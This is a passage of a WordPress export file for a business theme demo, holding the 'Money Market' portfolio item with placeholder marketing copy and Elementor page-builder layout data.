Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c51e86","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"aac24e0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b546128","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"46167ab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"16579bc","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"048c4ea","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Money Market</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/money-market/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=806</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>April 12, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>806</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money-market]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[807]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"16f55f4a","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"418cd74c","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ea00633","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1aec01ac","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"54e30f49","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"3f7f7a0b","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"768a37c4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bf03c4e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"14cfe9ce","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3803acb8","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"43e55b12","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"6e436e0b","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6c09acaf","elType":"widget","settings":{"editor":"<p>April 12, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7c3887","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"63f2a3ed","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"132a8999","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"73f1d5f9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"116d0b4d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"48fc431","elType":"section","settings":[],"elements":[{"id":"9e4c10e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"126cbf8","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"268add5","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e9bab9b","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"d89eb22","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"8d64f97","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a5cb07e","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f940bfa","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"2879bce","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a9fcd4f","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"583fdbb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"0e722df","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"95482b8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b2a0925","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"02f7144","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4c31d7f","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"c717d91","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"82c1961","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f9c04d7","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"9ee067c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"c478b54","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5aaf780","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"acd2886","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"2d960bb","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
